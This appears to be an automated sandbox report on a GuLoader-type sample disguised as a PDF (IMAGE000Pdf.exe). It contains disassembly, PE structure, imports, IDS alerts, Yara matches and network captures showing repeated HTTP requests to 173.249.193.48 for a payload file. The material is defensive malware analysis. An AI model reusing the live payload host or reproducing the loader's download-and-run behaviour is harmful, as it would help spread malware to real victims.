                                    call dword ptr [004080CCh]
                                    call dword ptr [004080D0h]
                                    and eax, BFFFFFFFh
                                    cmp ax, 00000006h
                                    mov dword ptr [007A8A6Ch], eax
                                    je 00007FA09CBBB853h
                                    push ebx
                                    call 00007FA09CBBEB41h
                                    cmp eax, ebx
                                    je 00007FA09CBBB849h
                                    push 00000C00h
                                    call eax
                                    mov esi, 004082B0h
                                    push esi
                                    call 00007FA09CBBEABBh
                                    push esi
                                    call dword ptr [00408154h]
                                    lea esi, dword ptr [esi+eax+01h]
                                    cmp byte ptr [esi], 00000000h
                                    jne 00007FA09CBBB82Ch
                                    push 0000000Bh
                                    call 00007FA09CBBEB14h
                                    push 00000009h
                                    call 00007FA09CBBEB0Dh
                                    push 00000007h
                                    mov dword ptr [007A8A64h], eax
                                    call 00007FA09CBBEB01h
                                    cmp eax, ebx
                                    je 00007FA09CBBB851h
                                    push 0000001Eh
                                    call eax
                                    test eax, eax
                                    je 00007FA09CBBB849h
                                    or byte ptr [007A8A6Fh], 00000040h
                                    push ebp
                                    call dword ptr [00408038h]
                                    push ebx
                                    call dword ptr [00408298h]
                                    mov dword ptr [007A8B38h], eax
                                    push ebx
                                    lea eax, dword ptr [esp+34h]
                                    push 000002B4h
                                    push eax
                                    push ebx
                                    push 0079FF08h
                                    call dword ptr [0040818Ch]
                                    push 0040A2C8h
                                    Programming Language:
                                    • [EXP] VC++ 6.0 SP5 build 8804
                                    NameVirtual AddressVirtual Size Is in Section
                                    IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                    IMAGE_DIRECTORY_ENTRY_IMPORT0x85040xa0.rdata
                                    IMAGE_DIRECTORY_ENTRY_RESOURCE0x3de0000x56ef8.rsrc
                                    IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                    IMAGE_DIRECTORY_ENTRY_SECURITY0xdef900x920.data
                                    IMAGE_DIRECTORY_ENTRY_BASERELOC0x00x0
                                    IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                    IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                    IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                    IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                    IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                    IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                    IMAGE_DIRECTORY_ENTRY_IAT0x80000x2b0.rdata
                                    IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                    IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                    IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0
                                    NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                    .text0x10000x656c0x660012117ad2476c7a7912407af0dcfcb8a7False0.6737515318627451data6.47208759712619IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                    .rdata0x80000x13980x1400e3e8d62e1d2308b175349eb9daa266c8False0.4494140625data5.137750894959169IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                    .data0xa0000x39eb780x6002020ca26e010546720fd467c5d087b57unknownunknownunknownunknownIMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                    .ndata0x3a90000x350000x0d41d8cd98f00b204e9800998ecf8427eFalse0empty0.0IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                    .rsrc0x3de0000x56ef80x57000c1896e67b80e50079ebeadcac8c0d8c3False0.13646338451867815data2.5203155069997596IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                    NameRVASizeTypeLanguageCountryZLIB Complexity
                                    RT_ICON0x3de2c80x42028Device independent bitmap graphic, 256 x 512 x 32, image size 0EnglishUnited States0.11415584223451786
                                    RT_ICON0x4202f00x10828Device independent bitmap graphic, 128 x 256 x 32, image size 0EnglishUnited States0.17530758310658937
                                    RT_ICON0x430b180x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 0EnglishUnited States0.27551867219917014
                                    RT_ICON0x4330c00x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 0EnglishUnited States0.3295028142589118
                                    RT_ICON0x4341680x468Device independent bitmap graphic, 16 x 32 x 32, image size 0EnglishUnited States0.47074468085106386
                                    RT_DIALOG0x4345d00x100dataEnglishUnited States0.5234375
                                    RT_DIALOG0x4346d00x11cdataEnglishUnited States0.6056338028169014
                                    RT_DIALOG0x4347f00xc4dataEnglishUnited States0.5918367346938775
                                    RT_DIALOG0x4348b80x60dataEnglishUnited States0.7291666666666666
                                    RT_GROUP_ICON0x4349180x4cdataEnglishUnited States0.7894736842105263
                                    RT_VERSION0x4349680x250dataEnglishUnited States0.5287162162162162
                                    RT_MANIFEST0x434bb80x33eXML 1.0 document, ASCII text, with very long lines (830), with no line terminatorsEnglishUnited States0.5542168674698795
                                    DLLImport
                                    ADVAPI32.dllRegCreateKeyExW, RegEnumKeyW, RegQueryValueExW, RegSetValueExW, RegCloseKey, RegDeleteValueW, RegDeleteKeyW, AdjustTokenPrivileges, LookupPrivilegeValueW, OpenProcessToken, SetFileSecurityW, RegOpenKeyExW, RegEnumValueW
                                    SHELL32.dllSHGetSpecialFolderLocation, SHFileOperationW, SHBrowseForFolderW, SHGetPathFromIDListW, ShellExecuteExW, SHGetFileInfoW
                                    ole32.dllOleInitialize, OleUninitialize, CoCreateInstance, IIDFromString, CoTaskMemFree
                                    COMCTL32.dllImageList_Create, ImageList_Destroy, ImageList_AddMasked
                                    USER32.dllGetClientRect, EndPaint, DrawTextW, IsWindowEnabled, DispatchMessageW, wsprintfA, CharNextA, CharPrevW, MessageBoxIndirectW, GetDlgItemTextW, SetDlgItemTextW, GetSystemMetrics, FillRect, AppendMenuW, TrackPopupMenu, OpenClipboard, SetClipboardData, CloseClipboard, IsWindowVisible, CallWindowProcW, GetMessagePos, CheckDlgButton, LoadCursorW, SetCursor, GetWindowLongW, GetSysColor, SetWindowPos, PeekMessageW, SetClassLongW, GetSystemMenu, EnableMenuItem, GetWindowRect, ScreenToClient, EndDialog, RegisterClassW, SystemParametersInfoW, CreateWindowExW, GetClassInfoW, DialogBoxParamW, CharNextW, ExitWindowsEx, DestroyWindow, CreateDialogParamW, SetTimer, SetWindowTextW, PostQuitMessage, SetForegroundWindow, ShowWindow, wsprintfW, SendMessageTimeoutW, FindWindowExW, IsWindow, GetDlgItem, SetWindowLongW, LoadImageW, GetDC, ReleaseDC, EnableWindow, InvalidateRect, SendMessageW, DefWindowProcW, BeginPaint, EmptyClipboard, CreatePopupMenu
                                    GDI32.dllSetBkMode, SetBkColor, GetDeviceCaps, CreateFontIndirectW, CreateBrushIndirect, DeleteObject, SetTextColor, SelectObject
                                    KERNEL32.dllGetExitCodeProcess, WaitForSingleObject, GetModuleHandleA, GetProcAddress, GetSystemDirectoryW, lstrcatW, Sleep, lstrcpyA, WriteFile, GetTempFileNameW, CreateFileW, lstrcmpiA, RemoveDirectoryW, CreateProcessW, CreateDirectoryW, GetLastError, CreateThread, GlobalLock, GlobalUnlock, GetDiskFreeSpaceW, WideCharToMultiByte, lstrcpynW, lstrlenW, SetErrorMode, GetVersion, GetCommandLineW, GetTempPathW, GetWindowsDirectoryW, SetEnvironmentVariableW, ExitProcess, CopyFileW, GetCurrentProcess, GetModuleFileNameW, GetFileSize, GetTickCount, MulDiv, SetFileAttributesW, GetFileAttributesW, SetCurrentDirectoryW, MoveFileW, GetFullPathNameW, GetShortPathNameW, SearchPathW, CompareFileTime, SetFileTime, CloseHandle, lstrcmpiW, lstrcmpW, ExpandEnvironmentStringsW, GlobalFree, GlobalAlloc, GetModuleHandleW, LoadLibraryExW, MoveFileExW, FreeLibrary, WritePrivateProfileStringW, GetPrivateProfileStringW, lstrlenA, MultiByteToWideChar, ReadFile, SetFilePointer, FindClose, FindNextFileW, FindFirstFileW, DeleteFileW
                                    Language of compilation systemCountry where language is spokenMap
                                    EnglishUnited States
                                    TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                    2024-11-04T16:16:05.830050+01002803270ETPRO MALWARE Common Downloader Header Pattern UHCa2192.168.2.949980173.249.193.4880TCP
                                    2024-11-04T16:16:29.112597+01002022930ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow1172.202.163.200443192.168.2.949795TCP
                                    2024-11-04T16:17:06.917480+01002022930ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow1172.202.163.200443192.168.2.949973TCP
                                    2024-11-04T16:17:14.626933+01002803270ETPRO MALWARE Common Downloader Header Pattern UHCa2192.168.2.949972173.249.193.4880TCP
                                    2024-11-04T16:17:33.163894+01002803270ETPRO MALWARE Common Downloader Header Pattern UHCa2192.168.2.949974173.249.193.4880TCP
                                    2024-11-04T16:17:51.674002+01002803270ETPRO MALWARE Common Downloader Header Pattern UHCa2192.168.2.949975173.249.193.4880TCP
                                    2024-11-04T16:18:10.179042+01002803270ETPRO MALWARE Common Downloader Header Pattern UHCa2192.168.2.949976173.249.193.4880TCP
                                    2024-11-04T16:18:28.685872+01002803270ETPRO MALWARE Common Downloader Header Pattern UHCa2192.168.2.949977173.249.193.4880TCP
                                    2024-11-04T16:18:47.170399+01002803270ETPRO MALWARE Common Downloader Header Pattern UHCa2192.168.2.949978173.249.193.4880TCP
                                    2024-11-04T16:19:05.689254+01002803270ETPRO MALWARE Common Downloader Header Pattern UHCa2192.168.2.949979173.249.193.4880TCP
                                    TimestampSource PortDest PortSource IPDest IP
                                    Nov 4, 2024 16:17:05.710382938 CET4997280192.168.2.9173.249.193.48
                                    Nov 4, 2024 16:17:05.715265036 CET8049972173.249.193.48192.168.2.9
                                    Nov 4, 2024 16:17:05.715348005 CET4997280192.168.2.9173.249.193.48
                                    Nov 4, 2024 16:17:05.715486050 CET4997280192.168.2.9173.249.193.48
                                    Nov 4, 2024 16:17:05.720283985 CET8049972173.249.193.48192.168.2.9
                                    Nov 4, 2024 16:17:14.626852036 CET8049972173.249.193.48192.168.2.9
                                    Nov 4, 2024 16:17:14.626933098 CET4997280192.168.2.9173.249.193.48
                                    Nov 4, 2024 16:17:14.627095938 CET4997280192.168.2.9173.249.193.48
                                    Nov 4, 2024 16:17:14.628896952 CET8049972173.249.193.48192.168.2.9
                                    Nov 4, 2024 16:17:14.628963947 CET4997280192.168.2.9173.249.193.48
                                    Nov 4, 2024 16:17:14.629172087 CET8049972173.249.193.48192.168.2.9
                                    Nov 4, 2024 16:17:14.629219055 CET4997280192.168.2.9173.249.193.48
                                    Nov 4, 2024 16:17:14.632215023 CET8049972173.249.193.48192.168.2.9
                                    Nov 4, 2024 16:17:24.648643017 CET4997480192.168.2.9173.249.193.48
                                    Nov 4, 2024 16:17:24.653719902 CET8049974173.249.193.48192.168.2.9
                                    Nov 4, 2024 16:17:24.653829098 CET4997480192.168.2.9173.249.193.48
                                    Nov 4, 2024 16:17:24.655884981 CET4997480192.168.2.9173.249.193.48
                                    Nov 4, 2024 16:17:24.660774946 CET8049974173.249.193.48192.168.2.9
                                    Nov 4, 2024 16:17:33.163755894 CET8049974173.249.193.48192.168.2.9
                                    Nov 4, 2024 16:17:33.163893938 CET4997480192.168.2.9173.249.193.48
                                    Nov 4, 2024 16:17:33.163992882 CET4997480192.168.2.9173.249.193.48
                                    Nov 4, 2024 16:17:33.168796062 CET8049974173.249.193.48192.168.2.9
                                    Nov 4, 2024 16:17:43.175214052 CET4997580192.168.2.9173.249.193.48
                                    Nov 4, 2024 16:17:43.180234909 CET8049975173.249.193.48192.168.2.9
                                    Nov 4, 2024 16:17:43.180346012 CET4997580192.168.2.9173.249.193.48
                                    Nov 4, 2024 16:17:43.180491924 CET4997580192.168.2.9173.249.193.48
                                    Nov 4, 2024 16:17:43.185269117 CET8049975173.249.193.48192.168.2.9
                                    Nov 4, 2024 16:17:51.673854113 CET8049975173.249.193.48192.168.2.9
                                    Nov 4, 2024 16:17:51.674001932 CET4997580192.168.2.9173.249.193.48
                                    Nov 4, 2024 16:17:51.674190998 CET4997580192.168.2.9173.249.193.48
                                    Nov 4, 2024 16:17:51.679280043 CET8049975173.249.193.48192.168.2.9
                                    Nov 4, 2024 16:18:01.692413092 CET4997680192.168.2.9173.249.193.48
                                    Nov 4, 2024 16:18:01.697391987 CET8049976173.249.193.48192.168.2.9
                                    Nov 4, 2024 16:18:01.697520018 CET4997680192.168.2.9173.249.193.48
                                    Nov 4, 2024 16:18:01.697673082 CET4997680192.168.2.9173.249.193.48
                                    Nov 4, 2024 16:18:01.702949047 CET8049976173.249.193.48192.168.2.9
                                    Nov 4, 2024 16:18:10.178888083 CET8049976173.249.193.48192.168.2.9
                                    Nov 4, 2024 16:18:10.179042101 CET4997680192.168.2.9173.249.193.48
                                    Nov 4, 2024 16:18:10.183975935 CET4997680192.168.2.9173.249.193.48
                                    Nov 4, 2024 16:18:10.188982010 CET8049976173.249.193.48192.168.2.9
                                    Nov 4, 2024 16:18:20.192487955 CET4997780192.168.2.9173.249.193.48
                                    Nov 4, 2024 16:18:20.197444916 CET8049977173.249.193.48192.168.2.9
                                    Nov 4, 2024 16:18:20.197586060 CET4997780192.168.2.9173.249.193.48
                                    Nov 4, 2024 16:18:20.197727919 CET4997780192.168.2.9173.249.193.48
                                    Nov 4, 2024 16:18:20.202524900 CET8049977173.249.193.48192.168.2.9
                                    Nov 4, 2024 16:18:28.685705900 CET8049977173.249.193.48192.168.2.9
                                    Nov 4, 2024 16:18:28.685872078 CET4997780192.168.2.9173.249.193.48
                                    Nov 4, 2024 16:18:28.686058044 CET4997780192.168.2.9173.249.193.48
                                    Nov 4, 2024 16:18:28.691334009 CET8049977173.249.193.48192.168.2.9
                                    Nov 4, 2024 16:18:38.691274881 CET4997880192.168.2.9173.249.193.48
                                    Nov 4, 2024 16:18:38.696599007 CET8049978173.249.193.48192.168.2.9
                                    Nov 4, 2024 16:18:38.696748018 CET4997880192.168.2.9173.249.193.48
                                    Nov 4, 2024 16:18:38.696914911 CET4997880192.168.2.9173.249.193.48
                                    Nov 4, 2024 16:18:38.702138901 CET8049978173.249.193.48192.168.2.9
                                    Nov 4, 2024 16:18:47.170270920 CET8049978173.249.193.48192.168.2.9
                                    Nov 4, 2024 16:18:47.170398951 CET4997880192.168.2.9173.249.193.48
                                    Nov 4, 2024 16:18:47.170535088 CET4997880192.168.2.9173.249.193.48
                                    Nov 4, 2024 16:18:47.175508022 CET8049978173.249.193.48192.168.2.9
                                    Nov 4, 2024 16:18:57.180800915 CET4997980192.168.2.9173.249.193.48
                                    Nov 4, 2024 16:18:57.185683966 CET8049979173.249.193.48192.168.2.9
                                    Nov 4, 2024 16:18:57.185795069 CET4997980192.168.2.9173.249.193.48
                                    Nov 4, 2024 16:18:57.186424017 CET4997980192.168.2.9173.249.193.48
                                    Nov 4, 2024 16:18:57.191380024 CET8049979173.249.193.48192.168.2.9
                                    Nov 4, 2024 16:19:05.689181089 CET8049979173.249.193.48192.168.2.9
                                    Nov 4, 2024 16:19:05.689254045 CET4997980192.168.2.9173.249.193.48
                                    Nov 4, 2024 16:19:05.689430952 CET4997980192.168.2.9173.249.193.48
                                    Nov 4, 2024 16:19:05.694294930 CET8049979173.249.193.48192.168.2.9
                                    Nov 4, 2024 16:19:15.707082033 CET4998080192.168.2.9173.249.193.48
                                    Nov 4, 2024 16:19:15.712402105 CET8049980173.249.193.48192.168.2.9
                                    Nov 4, 2024 16:19:15.712726116 CET4998080192.168.2.9173.249.193.48
                                    Nov 4, 2024 16:19:15.713170052 CET4998080192.168.2.9173.249.193.48
                                    Nov 4, 2024 16:19:15.718184948 CET8049980173.249.193.48192.168.2.9
                                    TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                    Nov 4, 2024 16:16:08.547070980 CET1.1.1.1192.168.2.90xc4ceNo error (0)shed.dual-low.s-part-0017.t-0009.t-msedge.netazurefd-t-fb-prod.trafficmanager.netCNAME (Canonical name)IN (0x0001)false
                                    Nov 4, 2024 16:16:08.547070980 CET1.1.1.1192.168.2.90xc4ceNo error (0)dual.s-part-0017.t-0009.fb-t-msedge.nets-part-0017.t-0009.fb-t-msedge.netCNAME (Canonical name)IN (0x0001)false
                                    Nov 4, 2024 16:16:08.547070980 CET1.1.1.1192.168.2.90xc4ceNo error (0)s-part-0017.t-0009.fb-t-msedge.net13.107.253.45A (IP address)IN (0x0001)false
                                    • 173.249.193.48
                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                    0192.168.2.949972173.249.193.48807752C:\Users\user\Desktop\IMAGE000Pdf.exe
                                    TimestampBytes transferredDirectionData
                                    Nov 4, 2024 16:17:05.715486050 CET180OUTGET /VdpAwrpsFeHTHv196.bin HTTP/1.1
                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                    Host: 173.249.193.48
                                    Cache-Control: no-cache


                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                    1192.168.2.949974173.249.193.48807752C:\Users\user\Desktop\IMAGE000Pdf.exe
                                    TimestampBytes transferredDirectionData
                                    Nov 4, 2024 16:17:24.655884981 CET180OUTGET /VdpAwrpsFeHTHv196.bin HTTP/1.1
                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                    Host: 173.249.193.48
                                    Cache-Control: no-cache


                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                    2192.168.2.949975173.249.193.48807752C:\Users\user\Desktop\IMAGE000Pdf.exe
                                    TimestampBytes transferredDirectionData
                                    Nov 4, 2024 16:17:43.180491924 CET180OUTGET /VdpAwrpsFeHTHv196.bin HTTP/1.1
                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                    Host: 173.249.193.48
                                    Cache-Control: no-cache


                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                    3192.168.2.949976173.249.193.48807752C:\Users\user\Desktop\IMAGE000Pdf.exe
                                    TimestampBytes transferredDirectionData
                                    Nov 4, 2024 16:18:01.697673082 CET180OUTGET /VdpAwrpsFeHTHv196.bin HTTP/1.1
                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                    Host: 173.249.193.48
                                    Cache-Control: no-cache


                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                    4192.168.2.949977173.249.193.48807752C:\Users\user\Desktop\IMAGE000Pdf.exe
                                    TimestampBytes transferredDirectionData
                                    Nov 4, 2024 16:18:20.197727919 CET180OUTGET /VdpAwrpsFeHTHv196.bin HTTP/1.1
                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                    Host: 173.249.193.48
                                    Cache-Control: no-cache


                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                    5192.168.2.949978173.249.193.48807752C:\Users\user\Desktop\IMAGE000Pdf.exe
                                    TimestampBytes transferredDirectionData
                                    Nov 4, 2024 16:18:38.696914911 CET180OUTGET /VdpAwrpsFeHTHv196.bin HTTP/1.1
                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                    Host: 173.249.193.48
                                    Cache-Control: no-cache


                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                    6192.168.2.949979173.249.193.48807752C:\Users\user\Desktop\IMAGE000Pdf.exe
                                    TimestampBytes transferredDirectionData
                                    Nov 4, 2024 16:18:57.186424017 CET180OUTGET /VdpAwrpsFeHTHv196.bin HTTP/1.1
                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                    Host: 173.249.193.48
                                    Cache-Control: no-cache


                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                    7192.168.2.949980173.249.193.48807752C:\Users\user\Desktop\IMAGE000Pdf.exe
                                    TimestampBytes transferredDirectionData
                                    Nov 4, 2024 16:19:15.713170052 CET180OUTGET /VdpAwrpsFeHTHv196.bin HTTP/1.1
                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                    Host: 173.249.193.48
                                    Cache-Control: no-cache


                                    Click to jump to process

                                    Click to jump to process

                                    Click to jump to process

                                    Target ID:0
                                    Start time:10:16:11
                                    Start date:04/11/2024
                                    Path:C:\Users\user\Desktop\IMAGE000Pdf.exe
                                    Wow64 process (32bit):true
                                    Commandline:"C:\Users\user\Desktop\IMAGE000Pdf.exe"
                                    Imagebase:0x400000
                                    File size:915'632 bytes
                                    MD5 hash:53441F2DE2D573F3B2E4FB35C248229B
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Yara matches:
                                    • Rule: JoeSecurity_GuLoader_2, Description: Yara detected GuLoader, Source: 00000000.00000002.1804567210.00000000050D3000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                    Reputation:low
                                    Has exited:true

                                    Target ID:3
                                    Start time:10:16:57
                                    Start date:04/11/2024
                                    Path:C:\Users\user\Desktop\IMAGE000Pdf.exe
                                    Wow64 process (32bit):true
                                    Commandline:"C:\Users\user\Desktop\IMAGE000Pdf.exe"
                                    Imagebase:0x400000
                                    File size:915'632 bytes
                                    MD5 hash:53441F2DE2D573F3B2E4FB35C248229B
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Yara matches:
                                    • Rule: JoeSecurity_GuLoader_2, Description: Yara detected GuLoader, Source: 00000003.00000002.3192256494.0000000002153000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                    Reputation:low
                                    Has exited:false

                                    Reset < >

                                      Execution Graph

                                      Execution Coverage:27%
                                      Dynamic/Decrypted Code Coverage:0%
                                      Signature Coverage:18.5%
                                      Total number of Nodes:704
                                      Total number of Limit Nodes:16
                                      execution_graph 2988 70022ca3 2989 70022cbb 2988->2989 2990 7002158f 2 API calls 2989->2990 2991 70022cd6 2990->2991 2240 4034a2 SetErrorMode GetVersion 2241 4034e1 2240->2241 2242 4034e7 2240->2242 2243 4067e3 5 API calls 2241->2243 2330 406773 GetSystemDirectoryW 2242->2330 2243->2242 2245 4034fd lstrlenA 2245->2242 2246 40350d 2245->2246 2333 4067e3 GetModuleHandleA 2246->2333 2249 4067e3 5 API calls 2250 40351b 2249->2250 2251 4067e3 5 API calls 2250->2251 2252 403527 #17 OleInitialize SHGetFileInfoW 2251->2252 2339 4063ee lstrcpynW 2252->2339 2255 403573 GetCommandLineW 2340 4063ee lstrcpynW 2255->2340 2257 403585 2341 405cf0 2257->2341 2260 4036d4 GetTempPathW 2345 403471 2260->2345 2262 4036ec 2263 4036f0 GetWindowsDirectoryW lstrcatW 2262->2263 2264 403746 DeleteFileW 2262->2264 2268 403471 12 API calls 2263->2268 2355 403015 GetTickCount GetModuleFileNameW 2264->2355 2265 405cf0 CharNextW 2267 4035c3 2265->2267 2267->2265 2273 4036bf 2267->2273 2274 4036bd 2267->2274 2269 40370c 2268->2269 2269->2264 2271 403710 GetTempPathW lstrcatW SetEnvironmentVariableW SetEnvironmentVariableW 2269->2271 2270 40375a 2278 405cf0 CharNextW 2270->2278 2312 4037fd 2270->2312 2325 40380d 2270->2325 2272 403471 12 API calls 2271->2272 2276 40373e 2272->2276 2472 4063ee lstrcpynW 2273->2472 2274->2260 2276->2264 2276->2325 2295 403779 2278->2295 2281 403947 2284 4039cb ExitProcess 2281->2284 2285 40394f GetCurrentProcess OpenProcessToken 2281->2285 2282 403827 2496 405a54 2282->2496 2290 403967 LookupPrivilegeValueW AdjustTokenPrivileges 2285->2290 2291 40399b 2285->2291 2288 4037d7 2473 405dcb 2288->2473 2289 40383d 2439 4059bf 2289->2439 2290->2291 2294 4067e3 5 API calls 2291->2294 2307 4039a2 2294->2307 2295->2288 2295->2289 2298 403853 lstrcatW 2299 40385e lstrcatW lstrcmpiW 2298->2299 2302 40387a 2299->2302 2299->2325 2300 4039b7 ExitWindowsEx 2300->2284 2303 4039c4 2300->2303 2305 403886 2302->2305 2306 40387f 2302->2306 2504 40140b 2303->2504 2304 4037f2 2488 4063ee lstrcpynW 2304->2488 2500 4059a2 CreateDirectoryW 2305->2500 2442 405925 CreateDirectoryW 2306->2442 2307->2300 2307->2303 2383 403abd 2312->2383 2314 40388b SetCurrentDirectoryW 2315 4038a6 2314->2315 2316 40389b 2314->2316 2447 4063ee lstrcpynW 2315->2447 2503 4063ee lstrcpynW 2316->2503 2321 4038f2 CopyFileW 2327 4038b4 2321->2327 2322 40393b 2323 4061b4 36 API calls 2322->2323 2323->2325 2489 4039e3 2325->2489 2326 40642b 17 API calls 2326->2327 2327->2322 2327->2326 2329 403926 CloseHandle 2327->2329 2448 40642b 2327->2448 2465 4061b4 MoveFileExW 2327->2465 2469 4059d7 CreateProcessW 2327->2469 2329->2327 2331 406795 wsprintfW LoadLibraryExW 2330->2331 2331->2245 2334 406809 GetProcAddress 2333->2334 2335 4067ff 2333->2335 2337 403514 2334->2337 2336 406773 3 API calls 2335->2336 2338 406805 2336->2338 2337->2249 2338->2334 2338->2337 2339->2255 2340->2257 2342 405cf6 2341->2342 2343 4035aa CharNextW 2342->2343 2344 405cfd CharNextW 2342->2344 2343->2260 2343->2267 2344->2342 2507 40669d 2345->2507 2347 403487 2347->2262 2348 40347d 2348->2347 2516 405cc3 lstrlenW CharPrevW 2348->2516 2351 4059a2 2 API calls 2352 403495 2351->2352 2519 405f13 2352->2519 2523 405ee4 GetFileAttributesW CreateFileW 2355->2523 2357 403055 2376 403065 2357->2376 2524 4063ee lstrcpynW 2357->2524 2359 40307b 2525 405d0f lstrlenW 2359->2525 2363 40308c GetFileSize 2364 4030a3 2363->2364 2380 403186 2363->2380 2370 4031f2 2364->2370 2364->2376 2379 402fb1 6 API calls 2364->2379 2364->2380 2562 403444 2364->2562 2366 40318f 2368 4031bf GlobalAlloc 2366->2368 2366->2376 2565 40345a SetFilePointer 2366->2565 2541 40345a SetFilePointer 2368->2541 2373 402fb1 6 API calls 2370->2373 2372 4031da 2542 40324c 2372->2542 2373->2376 2374 4031a8 2377 403444 ReadFile 2374->2377 2376->2270 2378 4031b3 2377->2378 2378->2368 2378->2376 2379->2364 2530 402fb1 2380->2530 2381 4031e6 2381->2376 2381->2381 2382 403223 SetFilePointer 2381->2382 2382->2376 2384 4067e3 5 API calls 2383->2384 2385 403ad1 2384->2385 2386 403ad7 2385->2386 2387 403ae9 2385->2387 2594 406335 wsprintfW 2386->2594 2595 4062bc 2387->2595 2391 403b38 lstrcatW 2392 403ae7 2391->2392 2586 403d93 2392->2586 2393 4062bc 3 API calls 2393->2391 2396 405dcb 18 API calls 2398 403b6a 2396->2398 2397 403bfe 2399 405dcb 18 API calls 2397->2399 2398->2397 2400 4062bc 3 API calls 2398->2400 2401 403c04 2399->2401 2402 403b9c 2400->2402 2403 403c14 LoadImageW 2401->2403 2404 40642b 17 API calls 2401->2404 2402->2397 2407 403bbd lstrlenW 2402->2407 2410 405cf0 CharNextW 2402->2410 2405 403cba 2403->2405 2406 403c3b RegisterClassW 2403->2406 2404->2403 2409 40140b 2 API calls 2405->2409 2408 403c71 SystemParametersInfoW CreateWindowExW 2406->2408 2438 403cc4 2406->2438 2411 403bf1 2407->2411 2412 403bcb lstrcmpiW 2407->2412 2408->2405 2413 403cc0 2409->2413 2415 403bba 2410->2415 2414 405cc3 3 API calls 2411->2414 2412->2411 2416 403bdb GetFileAttributesW 2412->2416 2417 403d93 18 API calls 2413->2417 2413->2438 2418 403bf7 2414->2418 2415->2407 2419 403be7 2416->2419 2420 403cd1 2417->2420 2600 4063ee lstrcpynW 2418->2600 2419->2411 2422 405d0f 2 API calls 2419->2422 2423 403d60 2420->2423 2424 403cdd ShowWindow 2420->2424 2422->2411 2601 405529 OleInitialize 2423->2601 2426 406773 3 API calls 2424->2426 2428 403cf5 2426->2428 2427 403d66 2429 403d82 2427->2429 2430 403d6a 2427->2430 2431 403d03 GetClassInfoW 2428->2431 2433 406773 3 API calls 2428->2433 2432 40140b 2 API calls 2429->2432 2436 40140b 2 API calls 2430->2436 2430->2438 2434 403d17 GetClassInfoW RegisterClassW 2431->2434 2435 403d2d DialogBoxParamW 2431->2435 2432->2438 2433->2431 2434->2435 2437 40140b 2 API calls 2435->2437 2436->2438 2437->2438 2438->2325 2440 4067e3 5 API calls 2439->2440 2441 403842 lstrcatW 2440->2441 2441->2298 2441->2299 2443 403884 2442->2443 2444 405976 GetLastError 2442->2444 2443->2314 2444->2443 2445 405985 SetFileSecurityW 2444->2445 2445->2443 2446 40599b GetLastError 2445->2446 2446->2443 2447->2327 2463 406438 2448->2463 2449 406683 2450 4038e5 DeleteFileW 2449->2450 2625 4063ee lstrcpynW 2449->2625 2450->2321 2450->2327 2452 406651 lstrlenW 2452->2463 2455 40642b 10 API calls 2455->2452 2456 4062bc 3 API calls 2456->2463 2457 406566 GetSystemDirectoryW 2457->2463 2458 406579 GetWindowsDirectoryW 2458->2463 2459 40669d 5 API calls 2459->2463 2460 4065ad SHGetSpecialFolderLocation 2460->2463 2464 4065c5 SHGetPathFromIDListW CoTaskMemFree 2460->2464 2461 40642b 10 API calls 2461->2463 2462 4065f4 lstrcatW 2462->2463 2463->2449 2463->2452 